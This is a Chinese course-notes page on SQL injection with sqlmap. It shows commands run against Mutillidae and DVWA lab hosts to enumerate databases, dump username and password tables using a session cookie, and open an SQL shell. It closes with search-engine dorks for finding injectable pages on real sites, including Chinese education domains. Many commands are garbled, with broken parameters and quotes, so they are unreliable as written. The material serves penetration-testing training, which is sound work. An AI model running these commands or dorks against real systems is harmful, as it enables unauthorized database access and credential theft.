SQL 注入攻击_7 | 学习笔记

简介: 快速学习 SQL 注入攻击_7

开发者学堂课程【网络安全攻防 - Web渗透测试SQL 注入攻击_7】学习笔记,与课程紧密联系,让用户快速学习知识。

课程地址:https://developer.aliyun.com/learning/course/630/detail/9910


SQL 注入攻击_7


内容介绍

一、  GET 方法注入

二、  POST 方法注入

三、  数据获取

四、  提权操作

五、  综合实例


一、  GET 方法注入

1.  //获取所有数据库

rootekali:~#sqlmap-u "http://192.168.106.134/mutillidae/index.php?page=user-

info.php&username-yangge&password-1238user-info-php-submit-button-=View+Account+Details"-dbs

image.png

2.  //获得所有用户

root@kali:~#sqlmap-uhttp://192.168.106.134/mutillidae/index.php?page=user-

info.php&username-yangge&password-123&user-info-php-submit-button=View+Account+Details”--us

3.  //获得当前用户

root@kali:-# sqlmap -u "http://192.168.106.134/mutillidae/index .php?page=user-info.php&username=yangge&password-123&user-info-php-submit-button=View-Account+Detailscurrent-user

image.png

4. sqlmap 参数解析

--users

--current-user

--dbs

--current -db

-D "database_name"  --tables

-D “database_name"-T "table_name”--columns

--dump-all

--dump-all --exclude-sysdbs

-D “database name"-T "table_name"--dump

-D "database name"--tables

-D “database_name"-T "table_name"--columns

--batch   //自动化完成

5. 示例步骤:

1) 获得当前数据库

root@kali:# sqlmap -u “http://192.168.106.134/mutillidae/index.php?page=use-info.php?username=yangge&password=1238user-info-php-submit-button=

View+Account+Details”\--batch--current-db

2) 获得数据库表

root@kali:~# sqlmap -u “http://192.168.106.134/mutillidae/index php?page-user-info.php&username=yangge&password=123&user-info-php-submit-button=View+Account +Details”\--batch -D nowasp --tables

image.png

1)  获得表的字段

root@kali:~# sqlmap -uhttp://192.168134/mutillidae/index.php?page-user-info.php&username=eee&password info-php-submit-button=View+Account+Detalls

--batch -D nowasp -T accounts --columns

2)  获得表中的数据

root@kali:~# sqlmap -u"http://192.168.166.134/mut1llidae/index.php?page-user-info.php&username-eee&password=eee&user-info-php-submit-button=View+Account+Details--batch -D nowasp -T accounts -C "username, password" --dump


二、  POST 方法注入

1.  需要带 cookie 才能访问的注入页面,--cookie=””

root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id=18Submit=Submit#\--cookie-PHPSESSID-10jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids-swingset,jotto,phpbb2,rednine;acgroupswithpersist-nada"--batch

image.png

2. root@kali:~# sqlmap -u“http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#”\--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -p id

image.png

1.  root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch --users

2.  root@kali:~# sqlmap -u“http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie="PHPSESSID-i0jcqf4uhd68qujcof3n322e95;securitylow;showhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada"--batch --current-user


三、  数据获取

1. --users

--current -user

--dbs

--current-db

-D database_name--tables

-D database name -T "table name"--columns

--dump-all

--dump-all --exclude-sysdbs

-D "database_name"-T "table_name”-C"usernane, password--dump

2.  root@kali~# sqlmap -u

http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-low;

showhints=1;acopendivids=swingset,jotto,phpbb2,redmine;acgro thpersist-nada” --batchusers

3.  root@kali:~# sqlmap -u "http://92.168.106.134/6

ea ilities/sqli/?id-18Submit-Submit#--cookie="PHPSESSID=10jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada”-- batch --current-db

4. root@kali:~# sqlmap

-u"httpi//192.168.106.134/dvwa/vulnerabilities/sq11/?id=18Submit-Submit#-cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D dvwa--tables

image.png

5. root@kali:~# sqlmap  

-u"http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-1&Submit-Submit#"cookie="PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-1ow;showhint5-1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D "dvwa"-T"users”--columns

6. root@kali:~# sqlmap -u

"http://192.168.106.134/dvwa/vulnerabilities/sq11/?1d-185ubmit-Submdtcookie-"PHPSESSID-10jcqf4uhd68qujcof3n322e95;security-low; showhints

acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D "dvwa" -T users" -C "username,password"--dump

7. root@kali:~# sqlmap -u  

http://192.168.106.134/dvwa/vulnerabilities/sq1i/?1d-185ubmit=Submit#”-cookie=”PHPSESSID=i0jcqf4uhd68qujcof3n322e95;secunitv=low:showhints=1;\

acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D”dvwa” -T “users"--dump

image.png


四、  提权操作

//与数据库交互--sql-shell

rootfkali:~# sqlmap -u http://192.168.106.134/dvwa/vuinerabilities/sqli/?id=1&Submit=Submit#-cookie="PHPSES5ID=i0jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" --batch --sql--shell

image.png


五、  综合实例

1.  通过 Google 搜索可能存在注入的页面

inurl:.php?id

inurl:.jsp?id

inurl:.asp?id=

inurl:/admin/login.php

inurl:.php?id- intitle:美女

2.  通过百度搜索可能存在注入的页面

inurl:news.asp?id= site:edu.cn

inurl:news.php?id= site;edu.cn

inurl:news.aspx?id= site;edu.cn

相关文章
|
3月前
|
算法 数据挖掘 数据库
通过 SQL 快速使用 OceanBase 向量检索学习笔记
通过 SQL 快速使用 OceanBase 向量检索学习笔记
|
3月前
|
SQL 数据库
SQL 学习笔记 - 多表关系与多表查询
数据库多表关系包括一对多、多对多和一对一,常用外键关联。多表查询方式有隐式/显式内连接、外连接、子查询等,支持别名和条件筛选。子查询分为标量、列、行、表子查询,常用于复杂查询场景。
|
SQL 安全 Java
除了Flask框架,还有哪些框架能防止SQL注入攻击?
这些框架都在安全方面有着较好的表现,通过它们的内置机制和安全特性,可以有效地降低 SQL 注入攻击的风险。然而,无论使用哪个框架,开发者都需要具备良好的安全意识,正确配置和使用框架提供的安全功能,以确保应用的安全可靠。同时,持续关注安全更新和漏洞修复也是非常重要的。
554 162
|
SQL 监控 安全
Flask 框架防止 SQL 注入攻击的方法
通过综合运用以上多种措施,Flask 框架可以有效地降低 SQL 注入攻击的风险,保障应用的安全稳定运行。同时,持续的安全评估和改进也是确保应用长期安全的重要环节。
515 71
|
SQL 监控 小程序
在微信小程序中使用 Vant 时如何防止 SQL 注入攻击?
在微信小程序中使用 Vant 时如何防止 SQL 注入攻击?
447 58
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
474 2
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
356 5
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
333 5
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,但安全挑战不容小觑。本文剖析Python Web应用中的三大安全威胁:SQL注入、XSS及CSRF,并提供防御策略。通过示例代码展示如何利用参数化查询、HTML转义与CSRF令牌构建安全防线,助您打造更安全的应用。安全是一场持久战,需不断改进优化。
238 3
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
280 6